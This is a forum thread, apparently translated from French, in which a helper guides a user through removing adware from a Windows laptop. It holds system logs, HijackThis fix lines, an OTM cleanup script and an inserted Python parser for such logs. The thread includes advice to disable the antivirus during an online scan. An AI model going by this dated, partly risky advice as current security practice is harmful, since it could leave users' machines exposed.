2010-02-20 23:17:36 ----RASHD---- C:\autorun.inf 2010-02-20 23:12:34 ----A---- C:\UsbFix.txt 2010-02-20 23:01:12 ----D---- C:\UsbFix 2010-02-20 20:47:06 ----D---- C:\Users\maman\AppData\Roaming\Malwarebytes 2010-02-20 20:47:01 ----D---- C:\ProgramData\Malwarebytes 2010-02-20 20:46:59 ----D---- C:\Program Files\Malwarebytes' Anti-Malware 2010-02-20 20:26:00 ----D---- C:\Program Files\trend micro 2010-02-20 20:25:59 ----D---- C:\rsit 2010-02-11 13:03:38 ----A---- C:\Windows\system32\tsbyuv.dll 2010-02-11 13:03:38 ----A---- C:\Windows\system32\quartz.dll 2010-02-11 13:03:38 ----A---- C:\Windows\system32\msyuv.dll 2010-02-11 13:03:38 ----A---- C:\Windows\system32\msvidc32.dll 2010-02-11 13:03:38 ----A---- C:\Windows\system32\msrle32.dll 2010-02-11 13:03:37 ----A---- C:\Windows\system32\msvfw32.dll 2010-02-11 13:03:37 ----A---- C:\Windows\system32\mciavi32.dll 2010-02-11 13:03:37 ----A---- C:\Windows\system32\iyuv_32.dll 2010-02-11 13:03:37 ----A---- C:\Windows\system32\avifil32.dll 2010-02-10 21:14:37 ----D---- C:\ProgramData\BVRP Software 2010-02-10 21:11:04 ----A---- C:\ProgramData\hpeA6B.dll 2010-02-10 21:10:37 ----D---- C:\ProgramData\Sony Ericsson 2010-01-24 14:24:34 ----A---- C:\Windows\system32\aswBoot.exe 2010-01-24 11:31:29 ----A---- C:\Windows\wininit.ini 2010-01-24 11:05:34 ----D---- C:\ProgramData\Spybot - Search & Destroy 2010-01-24 11:05:34 ----D---- C:\Program Files\Spybot - Search & Destroy 2010-01-24 10:39:25 ----A---- C:\Windows\system32\mshtml.dll 2010-01-24 10:39:24 ----A---- C:\Windows\system32\ieframe.dll 2010-01-24 10:39:23 ----A---- C:\Windows\system32\wininet.dll 2010-01-24 10:39:23 ----A---- C:\Windows\system32\urlmon.dll 2010-01-24 10:39:23 ----A---- C:\Windows\system32\iertutil.dll 2010-01-24 10:39:22 ----A---- C:\Windows\system32\occache.dll 2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeedsbs.dll 2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeeds.dll 2010-01-24 10:39:22 ----A---- C:\Windows\system32\jsproxy.dll 2010-01-24 
10:39:22 ----A---- C:\Windows\system32\ieUnatt.exe 2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieui.dll 2010-01-24 10:39:22 ----A---- C:\Windows\system32\iesysprep.dll 2010-01-24 10:39:22 ----A---- C:\Windows\system32\iepeers.dll 2010-01-24 10:39:22 ----A---- C:\Windows\system32\iedkcs32.dll 2010-01-24 10:39:17 ----A---- C:\Windows\system32\msfeedssync.exe 2010-01-24 10:39:17 ----A---- C:\Windows\system32\iesetup.dll 2010-01-24 10:39:17 ----A---- C:\Windows\system32\iernonce.dll 2010-01-24 10:39:17 ----A---- C:\Windows\system32\ie4uinit.exe 2010-01-23 22:39:44 ----D---- C:\ProgramData\Alwil Software 2010-01-23 16:56:16 ----A---- C:\Windows\ntbtlog.txt 2010-01-23 08:39:56 ----D---- C:\Users\maman\AppData\Roaming\HpUpdate 2010-01-23 08:39:53 ----D---- C:\Windows\Hewlett-Packard
======List of files/folders modified in the last 1 months======
2010-02-21 00:59:55 ----D---- C:\Windows\Temp 2010-02-20 23:28:47 ----D---- C:\Windows\Prefetch 2010-02-20 23:18:39 ----D---- C:\Program Files\Mozilla Firefox 2010-02-20 23:16:28 ----SHD---- C:\$RECYCLE.BIN 2010-02-20 23:12:30 ----D---- C:\Windows\SMINST 2010-02-20 22:48:38 ----A---- C:\Windows\NeroDigital.ini 2010-02-20 22:35:27 ----D---- C:\Users\maman\AppData\Roaming\Skype 2010-02-20 22:34:55 ----D---- C:\Users\maman\AppData\Roaming\skypePM 2010-02-20 22:33:27 ----D---- C:\Windows\system32\drivers 2010-02-20 22:33:27 ----D---- C:\Windows\SchCache 2010-02-20 22:31:01 ----HD---- C:\ProgramData 2010-02-20 21:56:54 ----D---- C:\Users\maman\AppData\Roaming\FileZilla 2010-02-20 20:46:59 ----RD---- C:\Program Files 2010-02-20 11:58:32 ----SHD---- C:\System Volume Information 2010-02-20 11:49:06 ----D---- C:\ProgramData\Skyline 2010-02-20 11:35:48 ----SHD---- C:\Windows\Installer 2010-02-20 11:35:43 ----D---- C:\ProgramData\Microsoft Help 2010-02-18 18:32:08 ----D---- C:\Windows 2010-02-16 16:20:22 ----D---- C:\Windows\System32 2010-02-16 16:20:22 ----D---- C:\Windows\inf 2010-02-16 16:20:22 ----A---- C:\Windows\system32\PerfStringBackup.INI 2010-02-13 13:53:55 ----D---- C:\Windows\system32\catroot2 2010-02-11 20:20:35 ----D---- C:\Windows\winsxs 2010-02-11 20:10:25 ----D---- C:\Windows\system32\catroot 2010-02-11 20:06:25 ----D---- C:\Program Files\Windows Mail 2010-02-10 21:10:37 ----HD---- C:\Program Files\InstallShield Installation Information 2010-02-10 21:10:37 ----D---- C:\Program Files\Sony Ericsson 2010-02-01 20:26:20 ----A---- C:\Windows\system32\mrt.exe 2010-01-31 11:48:33 ----D---- C:\Windows\Tasks 2010-01-31 11:48:33 ----D---- C:\Windows\system32\Tasks 2010-01-27 20:51:18 ----D---- C:\Program Files\Internet Explorer 2010-01-24 14:25:00 ----D---- C:\Program Files\Common Files\microsoft shared 2010-01-24 14:00:28 ----D---- C:\Users\maman\AppData\Roaming\Teleca 2010-01-24 14:00:24 ----D---- C:\Windows\Downloaded Installations 2010-01-24 14:00:11 ----D---- 
C:\Program Files\Common Files\Teleca Shared 2010-01-24 14:00:07 ----D---- C:\Program Files\Common Files 2010-01-24 13:54:46 ----D---- C:\Windows\system32\migration 2010-01-23 22:41:00 ----D---- C:\Program Files\Alwil Software
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr.sys [2010-02-11 23376] R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2010-02-11 162512] R1 aswTdi;avast! Network Shield Support; C:\Windows\system32\drivers\aswTdi.sys [2010-02-11 46672] R1 eabfiltr;eabfiltr; C:\Windows\system32\DRIVERS\eabfiltr.sys [2006-11-30 8192] R1 IDSvix86;Symantec Intrusion Prevention Driver; \??\C:\PROGRA~2\Symantec\DEFINI~1\SymcData\idsdefs\20080215.002\IDSvix86.sys [2008-02-13 261680] R1 kl1;kl1; C:\Windows\system32\DRIVERS\kl1.sys [2007-10-31 110096] R1 SRTSPX;SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [2007-11-30 43696] R1 SYMTDI;SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [2007-10-30 191536] R2 aswFsBlk;aswFsBlk; C:\Windows\system32\drivers\aswFsBlk.sys [2010-02-11 19024] R2 aswMonFlt;aswMonFlt; \??\C:\Windows\system32\drivers\aswMonFlt.sys [2010-02-11 51792] R2 mdmxsdk;mdmxsdk; C:\Windows\system32\DRIVERS\mdmxsdk.sys [2006-06-19 12672] R2 rimmptsk;rimmptsk; C:\Windows\system32\DRIVERS\rimmptsk.sys [2007-02-24 39936] R2 rimsptsk;rimsptsk; C:\Windows\system32\DRIVERS\rimsptsk.sys [2007-01-23 42496] R2 rismxdp;Ricoh xD-Picture Card Driver; C:\Windows\system32\DRIVERS\rixdptsk.sys [2007-01-23 37376] R2 XAudio;XAudio; C:\Windows\system32\DRIVERS\xaudio.sys [2006-11-28 8192] R3 BCM43XX;Pilote pour carte réseau Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016] R3 CmBatt;Pilote pour Batterie à méthode de contrôle ACPI Microsoft; C:\Windows\system32\DRIVERS\CmBatt.sys [2008-01-19 14208] R3 CnxtHdAudService;Conexant UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDRT32.sys [2008-03-03 188416] R3 HBtnKey;HBtnKey; C:\Windows\system32\DRIVERS\cpqbttn.sys [2006-06-28 9472] R3 HSF_DPV;HSF_DPV; C:\Windows\system32\DRIVERS\HSX_DPV.sys [2006-12-07 985600] R3 HSXHWAZL;HSXHWAZL; C:\Windows\system32\DRIVERS\HSXHWAZL.sys [2006-12-07 207360] R3 NVENETFD;NVIDIA nForce Networking Controller Driver; 
C:\Windows\system32\DRIVERS\nvmfdx32.sys [2007-03-07 1059112] R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2007-09-19 7626400] R3 nvsmu;nvsmu; C:\Windows\system32\DRIVERS\nvsmu.sys [2007-02-17 12032] R3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2009-04-11 89088] R3 SymEvent;SymEvent; \??\C:\Windows\system32\Drivers\SYMEVENT.SYS [2007-12-22 123952] R3 SynTP;Synaptics TouchPad Driver; C:\Windows\system32\DRIVERS\SynTP.sys [2007-01-13 181432] R3 usbvideo;Périphérique vidéo USB (WDM); C:\Windows\System32\Drivers\usbvideo.sys [2008-01-19 134016] R3 winachsf;winachsf; C:\Windows\system32\DRIVERS\HSX_CNXT.sys [2006-12-07 659968] R3 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\Windows\system32\DRIVERS\wmiacpi.sys [2008-01-19 11264] R3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2008-01-19 83328] S3 BCM43XV;Pilote de la carte réseau extensible Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016] S3 Dot4;Pilote MS IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4.sys [2008-01-19 131584] S3 Dot4Print;Pilote de classe Imprimante pour IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4Prt.sys [2008-01-19 16384] S3 dot4usb;MS Dot4USB Filter Dot4USB Filter; C:\Windows\system32\DRIVERS\dot4usb.sys [2008-01-19 36864] S3 drmkaud;Filtre de décodeur DRM (Noyau Microsoft); C:\Windows\system32\drivers\drmkaud.sys [2008-01-19 5632] S3 E100B;Pilote de carte Intel (R) PRO; C:\Windows\system32\DRIVERS\e100b325.sys [2006-11-02 163328] S3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDART.sys [2007-04-12 160768] S3 HSFHWAZL;HSFHWAZL; C:\Windows\system32\DRIVERS\VSTAZL3.SYS [2006-11-02 200704] S3 ialm;ialm; C:\Windows\system32\DRIVERS\igdkmd32.sys [2006-10-19 1380864] S3 MSKSSRV;Proxy de service de répartition Microsoft; C:\Windows\system32\drivers\MSKSSRV.sys [2008-01-19 8192] S3 MSPCLOCK;Proxy d'horloge de répartition Microsoft; 
C:\Windows\system32\drivers\MSPCLOCK.sys [2008-01-19 5888] S3 MSPQM;Proxy de gestion de qualité de répartition Microsoft; C:\Windows\system32\drivers\MSPQM.sys [2008-01-19 5504] S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\Windows\system32\drivers\MSTEE.sys [2008-01-19 6016] S3 NAVENG;NAVENG; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVENG.SYS [2008-01-21 82256] S3 NAVEX15;NAVEX15; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVEX15.SYS [2008-01-21 895312] S3 s816bus;Sony Ericsson Device 816 driver (WDM); C:\Windows\system32\DRIVERS\s816bus.sys [2007-06-19 81832] S3 s816mdfl;Sony Ericsson Device 816 USB WMC Modem Filter; C:\Windows\system32\DRIVERS\s816mdfl.sys [2007-06-19 13864] S3 s816mdm;Sony Ericsson Device 816 USB WMC Modem Driver; C:\Windows\system32\DRIVERS\s816mdm.sys [2007-06-19 107304] S3 s816mgmt;Sony Ericsson Device 816 USB WMC Device Management Drivers (WDM); C:\Windows\system32\DRIVERS\s816mgmt.sys [2007-06-19 99112] S3 s816nd5;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (NDIS); C:\Windows\system32\DRIVERS\s816nd5.sys [2007-06-19 21928] S3 s816obex;Sony Ericsson Device 816 USB WMC OBEX Interface; C:\Windows\system32\DRIVERS\s816obex.sys [2007-06-19 97320] S3 s816unic;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (WDM); C:\Windows\system32\DRIVERS\s816unic.sys [2007-06-19 97704] S3 SRTSP;SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [2007-11-30 279088] S3 SRTSPL;SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [2007-11-30 317616] S3 SYMDNS;SYMDNS; C:\Windows\System32\Drivers\SYMDNS.SYS [2007-10-30 12848] S3 SYMFW;SYMFW; C:\Windows\System32\Drivers\SYMFW.SYS [2007-10-30 145968] S3 SYMIDS;SYMIDS; C:\Windows\System32\Drivers\SYMIDS.SYS [2007-10-30 39856] S3 SYMNDISV;SYMNDISV; C:\Windows\System32\Drivers\SYMNDISV.SYS [2007-10-30 37936] S3 SYMREDRV;SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [2007-10-30 27696] S3 usb_rndisx;Carte RNDIS USB; C:\Windows\system32\DRIVERS\usb8023x.sys 
[2009-04-11 15872] S3 usbscan;Pilote de scanneur USB; C:\Windows\system32\DRIVERS\usbscan.sys [2008-01-19 35328] S3 WpdUsb;WpdUsb; C:\Windows\system32\DRIVERS\wpdusb.sys [2009-10-01 40448]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384] R2 HP Health Check Service;HP Health Check Service; c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe [2008-06-16 94208] R2 hpqddsvc;Service HP CUE DeviceDiscovery; C:\Windows\system32\svchost.exe [2008-01-19 21504] R2 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168] R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2007-04-19 75304] R2 Net Driver HPZ12;Net Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504] R2 OMSI download service;Sony Ericsson OMSI download service; C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe [2009-04-30 90112] R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504] R2 RapiMgr;@%windir%\WindowsMobile\rapimgr.dll,-104; C:\Windows\system32\svchost.exe [2008-01-19 21504] R2 SBSDWSCService;SBSD Security Center Service; C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368] R2 WcesComm;@%windir%\WindowsMobile\wcescomm.dll,-40079; C:\Windows\system32\svchost.exe [2008-01-19 21504] R2 XAudioService;XAudioService; C:\Windows\system32\DRIVERS\xaudio.exe [2006-11-28 386560] R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384] R3 avast! Web Scanner;avast! 
Web Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384] R3 hpqcxs08;hpqcxs08; C:\Windows\system32\svchost.exe [2008-01-19 21504] S2 SymAppCore;Symantec AppCore Service; c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe [] S3 Com4Qlb;Com4Qlb; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe [2007-01-09 110592] S3 FontCache;@%systemroot%\system32\FntCache.dll,-100; C:\Windows\system32\svchost.exe [2008-01-19 21504] S3 getPlusHelper;@C:\Program Files\NOS\bin\getPlus_Helper.dll,-101; C:\Windows\System32\svchost.exe [2008-01-19 21504] S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-11-20 136120] S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728] S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2008-11-04 441712] S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184] S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-02-12 880640] S3 stllssvr;stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [2007-02-17 74656] S3 usnjsvc;Service Messenger Sharing Folders USN Journal Reader; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328] S4 CLCapSvc;CyberLink Background Capture Service (CBCS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLCapSvc.exe [2007-04-23 262243] S4 CLSched;CyberLink Task Scheduler (CTS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLSched.exe [2007-04-23 106593]
-----------------EOF----------------- |
|
Posted on 21/02/2010 at 14:53 |
Grande Maîtresse astucienne |
Hello,
* Run HijackThis with "Do a system scan only", then check these lines:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
* Click FIX CHECKED
Next:
- Download OTM (by Old_Timer) to your desktop,
- Double-click OTM.exe to launch the program,
- Copy the list of files or folders below and paste it into the program window "Paste Instructions for Items to be Moved":
Begin copying here:
:Files
C:\ProgramData\32868532\32868532.exe
c:\program files\eorezo
:Commands
[emptytemp]
[reboot]
- Click MoveIt! to start the removal,
- The result will appear in the Results pane.
- Click Exit to close the program.
- Post the report, which is located here: C:\_OTM\MovedFiles
- You may be asked to restart your PC. If so, click Yes.
* Run a scan with IE here:
http://www.kaspersky.com/kos/eng/partner/default/pages/default/check.html?n=1259235770640
* Disable your antivirus for the duration of the scan
then post the report
|
|
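Added illustration, not part of the post above and not a HijackThis feature: a small Python parser that splits a flattened HijackThis log, like the ones pasted in this thread, back into entries and lists those that HijackThis itself marks as `(file missing)` or `(no file)`. The function names are hypothetical, the sample lines are copied from the post above, and the orphan marker is only one triage signal, not the criterion the helper used to choose the lines to fix.

```python
import re

# A HijackThis entry starts with a section code (R0-R3, F0-F3, N1-N4, O1-O24)
# followed by " - ". The zero-width pattern lets us split a log whose entries
# were run together on one line without consuming any text.
ENTRY_START = re.compile(r"(?<!\S)(?=(?:R[0-3]|F[0-3]|N[1-4]|O\d{1,2}) - )")

# Markers seen in the log above when the referenced file no longer exists.
ORPHAN = re.compile(r"\((file missing|no file)\)$")

# O2 entries: "O2 - BHO: <name> - {CLSID} - <path or marker>"
BHO = re.compile(
    r"^O2 - BHO: (?P<name>.*?) - (?P<clsid>\{[0-9A-Fa-f-]{36}\}) - (?P<target>.*)$"
)

# Sample lines copied from the post above, joined the way the forum flattened them.
SAMPLE = " ".join([
    r"R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896",
    r"O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)",
    r"O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll",
    r"O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)",
    r'O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime',
    r"O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll",
])


def split_entries(text):
    """Split a flattened or multi-line HijackThis log into one string per entry."""
    return [part.strip() for part in ENTRY_START.split(text) if part.strip()]


def parse_entry(line):
    """Return the section code, the orphan marker (if any) and BHO fields for O2 lines."""
    entry = {"code": line.split(" - ", 1)[0], "raw": line, "status": None}
    marker = ORPHAN.search(line)
    if marker:
        entry["status"] = marker.group(1)
    bho = BHO.match(line)
    if bho:
        entry["name"] = bho.group("name")
        entry["clsid"] = bho.group("clsid")
        # Strip the trailing marker so only the path (possibly empty) remains.
        entry["target"] = ORPHAN.sub("", bho.group("target")).strip()
    return entry


def orphaned_entries(text):
    """Entries whose registry reference points at a file that is no longer on disk."""
    return [e for e in map(parse_entry, split_entries(text)) if e["status"]]


if __name__ == "__main__":
    for e in orphaned_entries(SAMPLE):
        print(e["code"], e.get("name", ""), e.get("clsid", ""), "->", e["status"])
```

An orphaned entry is a leftover registry reference rather than running code, which is why the list in the post also contains lines this check does not flag.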
Posted on 21/02/2010 at 16:41 |
Petite astucienne
| Hello,
here is the report after the scan. Thank you.
All processes killed
Error: Unable to interpret <Begin copying here:> in the current context!
========== FILES ==========
File/Folder C:\ProgramData\32868532\32868532.exe not found.
c:\program files\EoRezo\EoAdv\tmp folder moved successfully.
c:\program files\EoRezo\EoAdv folder moved successfully.
c:\program files\EoRezo folder moved successfully.
========== COMMANDS ==========
[EMPTYTEMP]
User: All Users
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
User: Invité
->Temp folder emptied: 12609470 bytes
->Temporary Internet Files folder emptied: 29278246 bytes
->FireFox cache emptied: 14004158 bytes
User: maman
->Temp folder emptied: 1913 bytes
->Temporary Internet Files folder emptied: 82957231 bytes
->Java cache emptied: 522719 bytes
->FireFox cache emptied: 54641016 bytes
->Google Chrome cache emptied: 6053089 bytes
User: postgres
User: postgres0
User: Public
User: tinypgsvc
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 300116 bytes
%systemroot%\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 36386 bytes
RecycleBin emptied: 0 bytes
Total Files Cleaned = 191,00 mb
OTM by OldTimer - Version 3.1.9.0 log created on 02212010_155944
Files moved on Reboot...
File C:\Windows\temp\_avast5_\Webshlock.txt not found!
Registry entries deleted on Reboot... |
|
Posted on 21/02/2010 at 16:45 |
Grande Maîtresse astucienne |
OK
you can move on to the next step I gave earlier, the online scan
See you later |
|
Posted on 21/02/2010 at 17:05 |
Petite astucienne
| The program is starting. Please wait... Updates source is selected: http://www.kaspersky.com File download: packages/kos-extras.jar The program is started.
Updating the anti-virus database. Please wait... Updates source is selected: http://downloads1.kaspersky-labs.com/ Update completed.
The program is ready to scan your computer. |
|
Posted on 21/02/2010 at 19:56 |
Petite astucienne
| Good evening,
Is this the report you meant? I restarted the PC after the scan.
See you |
|
Posted on 21/02/2010 at 20:34 |
Petite astucienne
| Re
While waiting for the problem to be resolved, could you tell me how to temporarily disable my site? I'm afraid of infecting visitors because we are in the middle of the booking season, with a lot of traffic, and I'd rather avoid that.
Thanks again.
|
|
Posted on 21/02/2010 at 20:52 |
Petite astucienne
| |
|
Posted on 21/02/2010 at 22:31 |
Grande Maîtresse astucienne |
No, not at all; that is just the database being loaded, after which you have to run the online scan.
To disable your site, simply remove the main page from the server. |
|
Posted on 21/02/2010 at 22:32 |
Grande Maîtresse astucienne | in fact it says:
The program is ready to scan your computer.
that is, the program is ready to scan the computer; if you restarted it, then it did not scan it, and you have to start over.